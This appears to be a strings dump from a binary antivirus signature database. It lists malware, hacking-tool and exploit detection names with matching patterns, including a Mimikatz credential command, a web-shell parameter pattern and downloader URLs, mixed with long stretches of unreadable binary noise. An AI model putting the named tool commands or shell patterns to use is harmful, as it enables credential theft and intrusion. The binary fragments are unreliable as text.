!#SLF:AGGR:ExeFileDropBySystemProc!z_root s)F!#SLF:AGGR:ExeFileDropBySystemProc!z_root s*E!#AGGR:PowerShell/PSExploitDynamicAssembly !#SLF:HackTool:PowerShell/Internalon.I!MTB s*E!#SLF:HackTool:PowerShell/Internalon.I!MTB !#ALF:TrojanDownloader:O97M/EncDoc.TOTG!MTB s+D!#ALF:TrojanDownloader:O97M/EncDoc.TOTG!MTB !#ALF:TrojanDownloader:O97M/EncDoc.TOTH!MTB s+D!#ALF:TrojanDownloader:O97M/EncDoc.TOTH!MTB !#ALF:TrojanDownloader:O97M/EncDoc.TOTI!MTB s+D!#ALF:TrojanDownloader:O97M/EncDoc.TOTI!MTB !#ALF:TrojanDownloader:O97M/EncDoc.TOTJ!MTB s+D!#ALF:TrojanDownloader:O97M/EncDoc.TOTJ!MTB !#SLF:HackTool:PowerShell/Internalon.A1!MTB s+D!#SLF:HackTool:PowerShell/Internalon.A1!MTB !#AllowList:Trojan:PowerShell/Exclusion.SA!MTB s.A!#AllowList:Trojan:PowerShell/Exclusion.SA!MTB !#AllowList:Trojan:PowerShell/Exclusion.SB!MTB s.A!#AllowList:Trojan:PowerShell/Exclusion.SB!MTB !#AllowList:Trojan:PowerShell/Exclusion.SC!MTB s.A!#AllowList:Trojan:PowerShell/Exclusion.SC!MTB !#ALF:Exploit:Script/PulseSecureTempFileUse.A!dha s1>!#ALF:Exploit:Script/PulseSecureTempFileUse.A!dha !#ALF:AGGR:LUA:DroppedExeWithNoCertInStartUpFolder.A!gen s87!#ALF:AGGR:LUA:DroppedExeWithNoCertInStartUpFolder.A!gen !#BM_AT:AADADFS_utils [!#BM_AT:AADADFS_utils !#AGGREGATOR:VBSDropB64Temp U!#AGGREGATOR:VBSDropB64Temp !#PoCExchgSoapVulnPathFrags U!#PoCExchgSoapVulnPathFrags !#SLF:RtfFileAttachment.EA!bat R!#SLF:RtfFileAttachment.EA!bat !#SLF:RtfFileAttachment.EA!cmd R!#SLF:RtfFileAttachment.EA!cmd !#SLF:RtfFileAttachment.EA!com R!#SLF:RtfFileAttachment.EA!com !#SLF:RtfFileAttachment.EA!exe R!#SLF:RtfFileAttachment.EA!exe !#SLF:RtfFileAttachment.EA!hta R!#SLF:RtfFileAttachment.EA!hta !#SLF:RtfFileAttachment.EA!jar R!#SLF:RtfFileAttachment.EA!jar !#SLF:RtfFileAttachment.EA!jse R!#SLF:RtfFileAttachment.EA!jse !#SLF:RtfFileAttachment.EA!lnk R!#SLF:RtfFileAttachment.EA!lnk !#SLF:RtfFileAttachment.EA!pif R!#SLF:RtfFileAttachment.EA!pif !#SLF:RtfFileAttachment.EA!ps1 R!#SLF:RtfFileAttachment.EA!ps1 !#SLF:RtfFileAttachment.EA!scr R!#SLF:RtfFileAttachment.EA!scr !#SLF:RtfFileAttachment.EA!vbe R!#SLF:RtfFileAttachment.EA!vbe !#SLF:RtfFileAttachment.EA!vbs R!#SLF:RtfFileAttachment.EA!vbs !#SLF:RtfFileAttachment.EA!wsf R!#SLF:RtfFileAttachment.EA!wsf !#SLF:RtfFileAttachment.EA!wsh R!#SLF:RtfFileAttachment.EA!wsh !#Phish:PHP/Post_pkt_pat1.GG!MTB t P!#Phish:PHP/Post_pkt_pat1.GG!MTB !#TEL:Trojan:MSIL/AgentTesla.RT!MTB t#M!#TEL:Trojan:MSIL/AgentTesla.RT!MTB !#TEL:Trojan:PowerShell/WannaMine.X t#M!#TEL:Trojan:PowerShell/WannaMine.X !#ALF:Exploit:Script/Driftwood.A!dha t$L!#ALF:Exploit:Script/Driftwood.A!dha !#ALF:VirTool:PowerShell/Impez.B!MTB t$L!#ALF:VirTool:PowerShell/Impez.B!MTB !#ALF:Backdoor:Perl/Steadypulse.A!dha t%K!#ALF:Backdoor:Perl/Steadypulse.A!dha !#ALF:Trojan:Android/Generality.C!dha t%K!#ALF:Trojan:Android/Generality.C!dha !#ALF:Trojan:Win32/Cassini_100fd735!ibt t'I!#ALF:Trojan:Win32/Cassini_100fd735!ibt !#ALF:Trojan:Win32/Cassini_3a91dee0!ibt t'I!#ALF:Trojan:Win32/Cassini_3a91dee0!ibt !#ALF:Trojan:Win32/Cassini_d7752493!ibt t'I!#ALF:Trojan:Win32/Cassini_d7752493!ibt !#TEL:HackTool:MSIL/SharpPrintNightmare t'I!#TEL:HackTool:MSIL/SharpPrintNightmare !#TEL:O97M/PossibleDonoffWithPassword.A t'I!#TEL:O97M/PossibleDonoffWithPassword.A !#ALF:TrojanDownloader:O97M/Mratmc.A!ams t(H!#ALF:TrojanDownloader:O97M/Mratmc.A!ams !#SLFPER:AGGR:PowerShell/EncodedIEX!amsi t(H!#SLFPER:AGGR:PowerShell/EncodedIEX!amsi !#ALF:HSTR:Backdoor:Win32/ParalaxRat.ST01 t)G!#ALF:HSTR:Backdoor:Win32/ParalaxRat.ST01 !#SLF:SuspFilePersistenceByProc!cmstp.exe t)G!#SLF:SuspFilePersistenceByProc!cmstp.exe !#SLF:SuspFilePersistenceByProc!excel.exe t)G!#SLF:SuspFilePersistenceByProc!excel.exe !#SLF:SuspFilePersistenceByProc!mshta.exe t)G!#SLF:SuspFilePersistenceByProc!mshta.exe !#SLF:Trojan:PowerShell/Paraphernalia.B!MTB t+E!#SLF:Trojan:PowerShell/Paraphernalia.B!MTB !#AGG:AllowList:Win64/Recovery_Rapids.Unity.A t-C!#AGG:AllowList:Win64/Recovery_Rapids.Unity.A !#ALF:ExploitSwf a!#ALF:ExploitSwf !#do_deep_rescang a!#do_deep_rescang !#AGGR:Exploit:JS/EKeetz.A1 V!#AGGR:Exploit:JS/EKeetz.A1 !#TEL:Win32/VBObfuse.RA!MTB V!#TEL:Win32/VBObfuse.RA!MTB !#Trojan:MSIL/Tisifi.RA!MTB V!#Trojan:MSIL/Tisifi.RA!MTB !#TEL:AGGR:Linux/Coinminer.A U!#TEL:AGGR:Linux/Coinminer.A S!#AGGREGATOR:VBSDropB64EXETemp !#ALF:Trojan:HTML/Phish.PDH!MTB R!#ALF:Trojan:HTML/Phish.PDH!MTB !#ALF:Trojan:UEFI/EfiGuardDxe.A R!#ALF:Trojan:UEFI/EfiGuardDxe.A !#ALF:Trojan:O97M/Trickbot.SK!MTB u!P!#ALF:Trojan:O97M/Trickbot.SK!MTB !#ALF:Backdoor:Script/RpivotRelay.A u#N!#ALF:Backdoor:Script/RpivotRelay.A !#ALF:AGGR:SupplyChain.PassLoader.ST00A u'J!#ALF:AGGR:SupplyChain.PassLoader.ST00A !#ALF:Trojan:Win32/Cassini_49780dfd!ibt u'J!#ALF:Trojan:Win32/Cassini_49780dfd!ibt !#ALF:Trojan:Win32/Cassini_e1ed095b!ibt u'J!#ALF:Trojan:Win32/Cassini_e1ed095b!ibt !#ALF:TrojanDownloader:Java/Tnega.MB!MTB u(I!#ALF:TrojanDownloader:Java/Tnega.MB!MTB !#ALF:TrojanDownloader/CannonFresco.C!dha u)H!#ALF:TrojanDownloader/CannonFresco.C!dha !#ALF:TrojanDownloader/CannonFresco.D!dha u)H!#ALF:TrojanDownloader/CannonFresco.D!dha !#TEL:AGGR:XMLwithBase64PowerShellCommand u)H!#TEL:AGGR:XMLwithBase64PowerShellCommand !#ALF:TrojanDownloader:VBS/Donvibs.PMS!MTB u*G!#ALF:TrojanDownloader:VBS/Donvibs.PMS!MTB !#SLF:AGGR:ExeFileDropBySystemProc!desktop u*G!#SLF:AGGR:ExeFileDropBySystemProc!desktop !#SLF:AGGR:ExeFileDropBySystemProc!perflog u*G!#SLF:AGGR:ExeFileDropBySystemProc!perflog !#SLF:AGGR:ExeFileDropBySystemProc!startup u*G!#SLF:AGGR:ExeFileDropBySystemProc!startup !#SLF:AGGR:ExeFileDropBySystemProc!sysprof u*G!#SLF:AGGR:ExeFileDropBySystemProc!sysprof !#SLF:AGGR:ExeFileDropBySystemProc!usrtemp u*G!#SLF:AGGR:ExeFileDropBySystemProc!usrtemp !#SLF:AGGR:ExeFileDropBySystemProc!wintemp u*G!#SLF:AGGR:ExeFileDropBySystemProc!wintemp !#SLF:AGGR:FileDropBySystemProc!sysappdata u*G!#SLF:AGGR:FileDropBySystemProc!sysappdata !#ALF:Exploit:Script/GeneralityB.Script!dha u+F!#ALF:Exploit:Script/GeneralityB.Script!dha u/B!#SLFPER:Trojan:PowerShell/PSExploitShellCode.C !#O97M/Zloader d!#O97M/Zloader !#Exclude:dfsvc.ni.exe \\!#Exclude:dfsvc.ni.exe !#AGGR:AllowList:ExamSoft Y!#AGGR:AllowList:ExamSoft !#ALF:Trojan/PSUACBypass.A X!#ALF:Trojan/PSUACBypass.A !#ALF:Trojan/PSUACBypass.B X!#ALF:Trojan/PSUACBypass.B !#SLF:XML/XslJScriptCode.A X!#SLF:XML/XslJScriptCode.A !#AGGR:CryptoRSA_Machinekeys V!#AGGR:CryptoRSA_Machinekeys !#ALF:AGGR:Emotet.Download.s001 S!#ALF:AGGR:Emotet.Download.s001 !#ALF:Trojan:BAT/TwinGear.A!dha S!#ALF:Trojan:BAT/TwinGear.A!dha !#SLF:AGGR:SuspAmsiScanBypass.A S!#SLF:AGGR:SuspAmsiScanBypass.A !#TEL:Backdoor:Perl/Dirtelti.AS S!#TEL:Backdoor:Perl/Dirtelti.AS !#ALF:Exploit:HTML/Nebbier.A!dha v R!#ALF:Exploit:HTML/Nebbier.A!dha !#AGGR:MSIL/Obfuscator!Niciosansa v!Q!#AGGR:MSIL/Obfuscator!Niciosansa !#ALF:Backdoor:PHP/Dirtelti.UG!MTB v\"P!#ALF:Backdoor:PHP/Dirtelti.UG!MTB !#ALF:Backdoor:PHP/Dirtelti.UJ!MTB v\"P!#ALF:Backdoor:PHP/Dirtelti.UJ!MTB !#ALF:Exploit:Python/Psyselle.B!dha v#O!#ALF:Exploit:Python/Psyselle.B!dha !#ALF:Exploit:Script/Makeshift.B!dha v$N!#ALF:Exploit:Script/Makeshift.B!dha !#ALF:HackTool:Win32/Deepvoice.E!dha v$N!#ALF:HackTool:Win32/Deepvoice.E!dha !#ALF:Backdoor:PHP/PhishKITPage.A!MTB v%M!#ALF:Backdoor:PHP/PhishKITPage.A!MTB !#ALF:TrojanSpy:MSIL/AgentTesla.AX!MTB v&L!#ALF:TrojanSpy:MSIL/AgentTesla.AX!MTB !#ALF:Exploit:O97M/CVE-2017-0199.SR!MTB v'K!#ALF:Exploit:O97M/CVE-2017-0199.SR!MTB !#ALF:Trojan:Win32/Cassini_123dbbdd!ibt v'K!#ALF:Trojan:Win32/Cassini_123dbbdd!ibt !#ALF:Trojan:Win32/Cassini_fdc17213!ibt v'K!#ALF:Trojan:Win32/Cassini_fdc17213!ibt !#AGGR:MSILFOP:VirTool:MSIL/Obfuscator.BA v)I!#AGGR:MSILFOP:VirTool:MSIL/Obfuscator.BA !#SLF:SuspFilePersistenceByProc!cmdkey.exe v*H!#SLF:SuspFilePersistenceByProc!cmdkey.exe !#ALF:Exploit:Script/AndroidChromeVersionCheck.A!dha v4>!#ALF:Exploit:Script/AndroidChromeVersionCheck.A!dha !#//Possible_RubyCode ^!#//Possible_RubyCode !#ALF:Trojan:VBS/Zloader.A Y!#ALF:Trojan:VBS/Zloader.A !#Lua:CleanStubsExcludePath X!#Lua:CleanStubsExcludePath !#ALF:Phish:PHP/Antibot.GG!MTB U!#ALF:Phish:PHP/Antibot.GG!MTB !#ALF:Ransom:Win32/Sncupte.STA U!#ALF:Ransom:Win32/Sncupte.STA !#ALF:VirTool:MSIL/Smear.A!MTB U!#ALF:VirTool:MSIL/Smear.A!MTB !#TEL:LnkDownloadsViaPowerShell T!#TEL:LnkDownloadsViaPowerShell !#Trojan:Win32/SdbPrivElevation.B w!R!#Trojan:Win32/SdbPrivElevation.B !#ALF:VirTool:PowerShell/DizClp.A!MTB w%N!#ALF:VirTool:PowerShell/DizClp.A!MTB !#TEL:Trojan:MSIL/LoadInjector.PJ!ibt w%N!#TEL:Trojan:MSIL/LoadInjector.PJ!ibt !#TEL:TrojanDownloader:JS/Nemucod.JAO w%N!#TEL:TrojanDownloader:JS/Nemucod.JAO !#ALF:TrojanDownloader:O97M/EncDoc.STD w&M!#ALF:TrojanDownloader:O97M/EncDoc.STD !#AGGR:PowerShell/ExecutionPolicyBypass w'L!#AGGR:PowerShell/ExecutionPolicyBypass !#SLF:CmdSingleFileInsideArchive.A!7zip w'L!#SLF:CmdSingleFileInsideArchive.A!7zip !#SLF:JseSingleFileInsideArchive.A!7zip w'L!#SLF:JseSingleFileInsideArchive.A!7zip QoFP. Bw] bi R3PBAw[ K=2d*? Q|{Pa wGuw/ ]kZP oIt x [s&`/ lRvhX LSCN(1d 4C#Xbuv: \\~,KM n&>/ Rx=IR Z\t,n Z\tZ-cJ Z\tZ-cJ No'SR& 1EO# Lq^dM,bA 4pi$^ j^@\"{ d9\tDH%@ 33q14 llI>, Z a7 q&N9; Z!|' ~Ry_Hp DbHAZ Z(VB Z(ZSN Z(ZSN Fm0c! Z*EN= Z*EN= -#,Wu Z.5[x Z.5[x Z/4x Z0R*h Z0R*h Z1 m Z3GE lbZCLS Wu)Ke- E\\=*zP Z5;} jUB;T Z8Q= Z8Q= i@y5.Aa Z:ZklG_ Z:ZklG_ xP178 ZA7R x[/Yo[ nc>RA ZH^O ZI}}$y ZI}}$y ZJ.5 =]PHx ZNL4u3Y ZNL4u3Y ZOd=2L6> ZOd=2L6> QfOAi |Y 'l@ ZR}/ ZS3/O ZS3/O ZSRy dwT{B 9f()UIe ZX#^ :=@CwhG% ZZ`V Z[dO Z] ^ 1ru 6?&pQ9@ Zd,y ZhUwo ZhUwo u:uA( 2o mW Znwg\t Znwg\t ZoJ} Zp1^w\"V} Zp1^w\"V} :A?r$ Zu6O $)@kHi yQsuv Y3QlE Zx f0c Zx f0c ZxZ/ NItsp Zz0{ Zzwr (C&qa7E Z|-g%\"' Z|-g%\"' |zEm*: Gw!|I7 -3xiA ;GRs% HDw^eM w6x(E- s/|Y| 'RxI)p4f^7e^ in32/Vundo.IH !#HSTR:VirTool:MSIL/GeneralPacker.H 4D5A90000300000004000000FFFF 4D5A90000300000004000000FFFFxL !#HSTR:VirTool:Win32/Obfuscator.ACV!Export lb_rat2.dll SnowShow1 lb_rat2.dllSnowShow1xL !#HSTR:VirTool:Win32/Obfuscator.PN!crypt.2 !#HSTR:Virus:Win32/Patchload.2 !#HSTR:Win32/Banload.ZEE.URL.1 artplic.com.br/images/next_go.php artplic.com.br/images/next_go.phpxL !#HSTR:Win32/EmotetCrypt.MX!MTB !#HSTR:Win32/Pumba.2 Arquivo danificado. Alerta do Windows !#HSTR:Win32/Raccoon.D !#HSTR:Win64/Meterpreter!Kernel32.WaitForSingleObject !#HSTR:Wizrem.X1.PublisherSleepCycle !#Lowfi:HSTR:MSIL:Downreg.A bjectValue Downloader.exe bjectValueDownloader.exeRandomizexL !#Lowfi:HSTR:Win32/DriverUpdater.B name=\"SmartDriverUpdater.exe\" name=\"SmartDriverUpdater.exe\"xL !#Lowfi:HSTR:Win32/GetNow.B ,\"eventType\":13,\"eventName\":\"bundle\" ,\"eventType\":13,\"eventName\":\"bundle\"xL !#Lowfi:HSTR:Win32/Hrup http://%s/information.php?a=%s&b=%d&c=%d http://%s/information.php?a=%s&b=%d&c=%dxL !#Lowfi:HSTR:Win32/Obfuscator.Enigma TEnigmaProtectorLoaderTimer TEnigmaProtectorLoaderTimerxL !#Lowfi:HSTR:Win32/Obfuscator.WinLicense WinLicenseDriverVersion WinLicenseDriverVersionxL !#Lowfi:HSTR:Win32/Softobase.B http://download.softobase.com/ru/ http://download.softobase.com/ru/xL !#Lowfi:HSTR:Win32/Solimba.C dmgr.Properties.Resources.resources dmgr.Properties.Resources.resourcesxL !#PWS:Win32/Fareit.MV!MTB !#Possible:Trojan:Kovter WinSock 2.0 Running !#SLF:HSTR:Exploit:MS1710 !#SLF:Win32/WannaCrypt.B!rsm !#TEL:Trojan:Win32/Dukozy_RC4_key A0E1054B-01EE-4D57-A059-4D99F339709F} A0E1054B-01EE-4D57-A059-4D99F339709F}xL !#ALF:Trojan:Win32/Booktoo.B!dha \\dc_dwm_oob\\ \\SEP_WriteFile\\ \\SEP_WriteFile\\xL !#HSTR:Nivdort.BZ!jump !#HSTR:Ransom:Win32/Reveton.gen!B2 !#HSTR:Win32/Meterpreter!ole32 OLE32 j2hole3 !#HSTR:Win32/Meterpreter!ole32_APIs !#HSTR:Win64/Meterpreter!Kernel32.LoadLibraryA !#HSTR:Ransom:Win32/Reveton.gen!B1 !#ALF:HSTR:MSIL:Packer:S001 d/\"xL !#ALFPER:Meterpreter.gen!D!ws2_32 ]h32hws2_ThLw& !#HSTR:Backdoor:MSIL/Getob.D!A boteg.exe boteg.exe<Module> boteg.pdb boteg.pdbxL !#HSTR:Trojan:Win32/C2Lop.gen!I ;%G6- !#HSTR:Trojan:Win32/SpyNoon.AMPV6!MTB Ixkdoc VirtualProtectxL !#HSTR:VirTool:Win32/Antihv.A!Bios SystemBiosVersion VRTUAL VRTUALxL !#HSTR:VirTool:Win32/VBInject.ADS HijackAplication zDecoder zDecoderxL company.srl bethel.exe bethel.exexL !#TEL:VirTool:Win32/Foovoola.A <>\\uS !#ALF:Trojan:Win32/BdDolphin.A!dha \\bd_work\\bd\\ \\Dolphin !#ALF:Trojan:Win32/DarkShadowRecognizer.A!dha \\DotNETRecognizer\\ \\DotNETRecognizer\\xL !#HSTR:AutoAttrMsil_1C42766A ssembly.Memory ver.exe efsPro efsProxL !#HSTR:AutoAttrMsil_89EFB743 der.exe nder.e r.Form1.resour r.Form1.resourxL !#HSTR:AutoAttrMsil_D0DCD262 LateGe nIndent TabPagexL !#HSTR:Trojan:Win32/VBObfuse.AKI!MTB / !#HSTR:TrojanSpy:Win32/Wekrober_crypt !#HSTR:TrojanSpy:Win32/Wekrober_cryptd !#ALF:HSTR:Trojan:Win32/Beeldeb.D!bit !#ALF:Ransom:Win32/Ryuk.ZY SVW`2 !#ALF:Trojan:Win32/Zloader.ZY !#ALFPER:HSTR:ConvertAdEnc.A1 !#ALFPER:MeterpreterLoaderx86 !#EFI_BLUETOOTH_IO_SERVICE_BINDING_PROTOCOL_GUID !#EFI_BUS_SPECIFIC_DRIVER_OVERRIDE_PROTOCOL_GUID !#EFI_NETWORK_INTERFACE_IDENTIFIER_PROTOCOL_GUID !#HSTR:EnableDeepAnalysisForGoldMax main.send_co mand_result !#HSTR:Knonyme_filedecode.A !#HSTR:Nivdort.EK!GetProcAddress !#HSTR:Possible:Crowti !#HSTR:PossiblyClean:AppViewer.URL.A .cmoney.tw/appxM !#HSTR:SonoControl_Bundler sonocontrol.com Sono Control sonocontrol.comPublisherSono ControlxM !#HSTR:TrojanDownloader:Win32/Small.IJ !#HSTR:TrojanSpy:Win32/Nivdort.G7 !#HSTR:VirTool:Win32/Obfuscator.PN!crc_key_2 !#HSTR:VirTool:Win32/Obfuscator.PN!k4_k5.0_345C !#HSTR:Win32/Meterpreter!Kernel32.WaitForSingleObject !#Injector.DH !#Lowfi:HSTR:Win32/ArcadeYum $ArcadeYum SoftwarxM !#Lowfi:HSTR:Win32/Fenomen http://www.fenomen-games.com/dhome.htm http://www.fenomen-games.com/dhome.htmxM !#Lowfi:HSTR:Win32/MediaGet <mediagetLaunched></mediagetLaunched> <mediagetLaunched></mediagetLaunched>xM !#Lowfi:HSTR:Win32/Meinhudong username=%s&taskid=%s&action=taskok username=%s&taskid=%s&action=taskokxM !#Lowfi:HSTR:Win32/Solimba.D http://api.downloadmr.com/installer/ http://api.downloadmr.com/installer/xM !#Lowfi:HSTR:Win32/Wajam http://www.wajam.com/webenhancer/logging http://www.wajam.com/webenhancer/loggingxM !#Lowfi:HSTR:Win32/Widdit D:\\Main\\InstHelper\\Release\\cinshlpr.pdb D:\\Main\\InstHelper\\Release\\cinshlpr.pdbxM !#Lowfi:HSTR:Win32/WuJi http://tongji.bianya.cc/popup.ashx?type=0 http://tongji.bianya.cc/popup.ashx?type=0xM !#TEL:HSTR:Trojan:Win64/Solorigate.SA!dha !#TEL:SoftwareBundler:Win32/OutBrowse.E \\exe.zip !#TrojanSpy:Win32/Bancos.gen!K_1 !#obfuscator_possible_Recslurp_1 !#HSTR:Nivdort.BW!jump !#HSTR:Win32/Kyucap !#ALF:HSTR:Adware:Win32/Hicosmea @@YAPEADPEADPEAK@Z @@YAPEADXZ @@YAPEADXZxM !#ALFPER:HSTR:LeftForce [{LeftForce}] [{LeftForce}]xM !#HSTR:DisableAMSI.Patch.B WAVAWH !#HSTR:MonitoringTool:Win32/QASpy.1 \\Qa Screen Spy\\ wmspdmvoe wmspdmvoexM !#HSTR:Trojan:Win32/EyeStye_01 !#HSTR:Trojan:Win32/SpyNoon.AMPV63!MTB Hfkeoc VirtualProtectxM !#SLFPER:Exploit:Win32/Belmont.V!dha ExpLib.dll ExploitNetIo ExploitNetIoxM !#TEL:Constructor:Win32/Netwire.A!RAT NetWire World Wired Labs World Wired LabsxM !#Win32/Bambalam_HSTR1 BAMBALAM_GETINI.PHP BAMBALAM_INIT.PHP BAMBALAM_INIT.PHPxM !#BanloadExclusion \\profin.ini \\acesso.pfn ProFIN Comercial ProFIN ComercialxM !#HSTR:Tesch_B64_Decryption !#ALF:Exploit:Win32/RoofRaiser.G!dha CreatePipe !#ALFPER:NTApiHash.A !#HSTR:Win32/Vundo.gen!AS !#TEL:HackTool:Win32/Mimikatz.NPTT sekurlsa::krbtgt !#Trojan:MSIL/BlackFus.B !#HSTR:obfuscator_oa_type00A !#ALF:HSTR:MITM:CrushArcade CrushArcade SoftwarxN !#ALF:HSTR:PWS:Win32/QQPass.CKH!bit C:\\WINDOWS\\system32\\myhook.dll C:\\WINDOWS\\system32\\myhook.dllxN !#ALF:HSTR:Trojan:Win32/Injector.YZ!bit !#ALF:HSTR:VirTool:Win32/Injector.S0F 2D$92 !#ALF:PWS:Win32/Zbot.RH!MTB !#ALF:Trojan:MSIL/Chopper request.item[\"z1\"] @request.item[\"z2\"] @request.item[\"z2\"]xN !#ALF:Trojan:Win32/VBKrypt.BF!MTB !#ATTRIBUTE:HSTR:ThirdPartyAlgo.A!bit !#FakeCert!METSPCA2018 !#FakeCert!METSRCA2018 !#FakeCert!MOSICICA2012 S[dxN !#FakeCert!MSSPPCA2018 !#HSTR:BanloadXorPrev1 !#HSTR:BrowserModifier:Win32/Sasquor.I DoDKP64.dllAnalyzeCodeGOxN !#HSTR:ML:Win32/Banload_BFL_PROJECT indyproject.orgxN !#HSTR:MSIL/Injector.IE \t0-9A-Za-z.Run `GetProcAddress !#HSTR:PWS:Win32/Lmir.gen!D !#HSTR:PossiblyClean:Win32/JMJ.LegalCopyright.A JMJ 1992-xN !#HSTR:PossiblyClean:Win32/NetBidClient.ModuleName.A BidWizard.exe BidWizard.exexN !#HSTR:Program:Win32/JustPlugIt.A !#HSTR:Trojan:Win32/Alureon.S1 !#HSTR:Trojan:Win32/ShadowPad.B!dha !#HSTR:TrojanDownloader:Win32/Harnig.gen!R !#HSTR:VirTool:Win32/Obfuscator.ACV!enc SWVUP !#HSTR:Win32/ObfVirtualAllocCall.A !#HSTR:Win32/Obfuscator.API.NullArgs.A !#HSTR:Win32/OddItau.A \\root\\itau c:\\windows\\system32\\drivers !#HSTR:Win32/Trickbot.12 wob9OWH%~d5ydk0tj6SD**{79Y7D|}qR2P%hLtEe wob9OWH%~d5ydk0tj6SD**{79Y7D|}qR2P%hLtEexN !#HSTR:XmlSerialGadgetMvDict typeserializablemultivaluedictionary typeserializablemultivaluedictionaryxN !#Lowfi:HSTR:Win32/DealPly.B CIPCListenerClient::OnInjectionConfig CIPCListenerClient::OnInjectionConfigxN !#Lowfi:HSTR:Win32/FastLoads http://fast-loads2.name/agreement.php http://fast-loads2.name/agreement.phpxN !#Lowfi:HSTR:Win32/Nosibox IDS_PING_NOSIBAY_DETECTION_DEFAULT_HOST IDS_PING_NOSIBAY_DETECTION_DEFAULT_HOSTxN !#Lowfi:HSTR:Win32/Obfuscator.BitArts ..\\Desktop\\Startup\\Bitar.vbp ..\\Desktop\\Startup\\Bitar.vbpxN !#Lowfi:HSTR:Win32/Salus http://log.dataurls.com/log/settings.json http://log.dataurls.com/log/settings.jsonxN !#TEL:Trojan:Win32/Dukozy_dyn_dll winhxN !#TEL:Trojan:Win32/Mswshlco.A!dha !#TELPER:Exploit:Win32/Belmont.J!dha !#do_exhaustivehstr_rescan_lecpetex !#ALF:Backdoor:Revetrat Revenge-RAT *-]NK[-*xN !#HSTR:Metasploit.Trampoline.A !#HSTR:Nivdort.EK!crypt !#HSTR:Trojan:Win32/Busky.gen!C aV19DaV19D aV19DaV19DxN !#HSTR:VirTool:Win32/Obfuscator.PN!xor_plus_2 !#HSTR:Trojan:Win32/Vundo.gen!D.1 !#ALF:Trojan:UEFI/MosaicRegressor.B !#ALF:Trojan:Win32/BdAlterDropper.A!dha %s%s\\%s\\%s main_func main_funcxN !#ALF:Trojan:Win32/RenoFloss.L!dha VFTRACE.dll VFTRACE.dllxN !#HSTR:AllowList:Win32/Obfuscator.ALD !#HSTR:BrowserModifier:Win32/Diplugem.H Polymorphic DynLoader DynLoaderxN !#HSTR:IsWinlogon winlogon.PDB MICROSOFT_AUTHENTICATION_PACKAGE MICROSOFT_AUTHENTICATION_PACKAGExN !#HSTR:Trojan:Win32/Guloader.AV7!MTB !#HSTR:VirTool:Win32/VBInject.ACE obalxN !#Lowfi:HSTR:BlankitDropper itter_ Sorvete.exexN !#TELPER:HSTR/HashtagBanload I1JDTlQj I1BNU0Uj !#TELPER:Trojan:Win32/PlaKeylog.A!dha !#HSTR:Ropest.I 8!CFG 8!CFGxN !#ALF:Trojan:MSIL/EliteGenClient.B!dha \\Elite\\elite_client\\csharp\\ \\Elite\\elite_client\\csharp\\xN !#ALF:Exploit:Win32/Cauldroner.A!dha Device\\CNG !#HSTR:Backdoor:Win32/Plugx!timecheck !#HSTR:Trojan:Win32/Vundo.IU !#ALF:Backdoor:Drixed:Service $ worker_x !#ALF:Trojan:Win32/Lokibot.RI!MTB !#HSTR:Win32/Harlook tmp32tmp\\ \\mail.rptx tmp32tmp\\\\mail.rptx !#ALF:Backdoor:MSIL/Bladabindi.MMF!MTB !#ALF:HSTR:Codecopy.S01 !#ALF:HSTR:HackTool:MSIL/Suspicious.SkypeCracker SkypeCracker.exe SkypeCracker.exexO !#HSTR:AutoitItV3ModAU3!Mark &#SVW !#HSTR:ListControlVirtualProtectCall !#HSTR:MSIL/Base64Decoder.A !#HSTR:MSIL/Tisifi.RA1!MTB !This program cannot be run in DOS mode.xO !#HSTR:MSIL/lnk.exe.temp.A .exe.lnk !#HSTR:Obfuscator_mod_init_buffer !#HSTR:PWS:Win32/Lmir.gen!C !#HSTR:PWS:Win32/Lmir.gen!F !#HSTR:PossiblyClean:BloombergProfessional.ModuleName.A Wintrv.exe Wintrv.exexO !#HSTR:PossiblyClean:Computrace.FileName.A AVXmFile.xmlxO !#HSTR:PossiblyClean:Win32/onlinebrief24.ModuleName.A onlinebrief24 onlinebrief24xO !#HSTR:StrObf_TransferComplete E8 xO !#HSTR:Thinstall ThinApp Boot Loader ErrorxO !#HSTR:TrojanDownloader:Win32/Rirdra GET /7/?r=site/GTCD HTTP/1.0 xO !#HSTR:TrojanDropper:Win32/Vundo.AB !#HSTR:VirTool:MSIL/Contrenre.A !#HSTR:VirTool:Win32/Obfuscator.ABM !#HSTR:Win32/RedPillCrypter :\\LastSave\\RedPillCrypter esource.h esource.hPADxO !#Lowfi:Dewiz_Obfus !#Lowfi:HSTR:BProtect:BingIEToolbar @VCBingSearchBox@@VCWindow@ATL@ @VCBingSearchBox@@VCWindow@ATL@xO !#Lowfi:HSTR:Win32/Chindo \"description\": \"User feedback extension\", \"description\": \"User feedback extension\",xO !#Lowfi:HSTR:Win32/DeltaSearch IDC_CB_DELTASEARCHxO !#Lowfi:HSTR:Win32/Elex.C [dskSvc](2612): CNTService::~CNTService() [dskSvc](2612): CNTService::~CNTService()xO !#Lowfi:HSTR:Win32/Installium /Configuration/offerValueAfterInstall /Configuration/offerValueAfterInstallxO !#Lowfi:HSTR:Win32/OptimizerPro Register your copy of Optimizer Pro Register your copy of Optimizer ProxO !#Lowfi:HSTR:Win32/SoftPulse.B getScriptNextOfferxO !#Lowfi:HSTR:Win32/Softobase &t=pageview&dp=%2Fbp_wrapper_offer_yes &t=pageview&dp=%2Fbp_wrapper_offer_yesxO !#TEL:Trojan:Win32/Dukozy_module_PIC.B !#TEL:Trojan:Win32/Sploit_WS32.A !#VirTool:Win32/Obfuscator.AIZ CoupoonService64xO !#HSTR:Miloapi!A /input/in/Nwh $ .textH RSDSD(o mqsec.pdb mqsec.pdbj ExitProcessKERNEL32.dllUc.a MQSEC.DLL MQSigCloneCertFromReg MQSigCloneCertFromSysStore MQSigCreateCertificate MQSEC.DLLMQSigCloneCertFromRegMQSigCloneCertFromSysStoreMQSigCreateCertificate $ mqutil.pdb mqutil.pdbj ExitProcessKERNEL32.dllTc.a MQUTIL.DLL MQGetResourceHandle MQUTIL.DLLMQGetResourceHandle $ RSDSn netsh.pdb netsh.pdbj ExitProcessKERNEL32.dllUc.a< NETSH.EXE FreeString MakeQuotedString MakeString MatchEnumTag MatchToken PrintError PrintMessage PrintMessageFromModule RegisterContext RegisterHelper \tNETSH.EXEFreeStringMakeQuotedStringMakeStringMatchEnumTagMatchTokenPrintErrorPrintMessagePrintMessageFromModuleRegisterContextRegisterHelper $ .reloc(@ RSDST/ C:\\RSDST/ shfolder.pdb QPPh, =8/Q| GetVolumeInformationWKERNEL32.dllid.a< SHFOLDER.DLL SHGetFolderPathA SHELL32.SHGetFolderPathA SHGetFolderPathW SHELL32.SHGetFolderPathW 